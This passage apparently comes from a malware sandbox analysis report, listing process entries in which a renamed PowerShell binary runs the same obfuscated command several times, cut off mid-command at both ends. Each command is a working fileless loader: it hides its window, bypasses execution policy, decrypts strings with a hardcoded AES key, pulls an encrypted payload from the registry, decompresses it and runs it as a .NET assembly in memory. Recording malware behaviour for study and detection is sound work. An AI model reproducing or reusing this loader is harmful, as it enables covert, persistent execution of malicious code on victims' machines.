'')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        Hide Artifacts: Hidden Window
        
        PID:9412
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:1160
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:9672
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:6040
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = 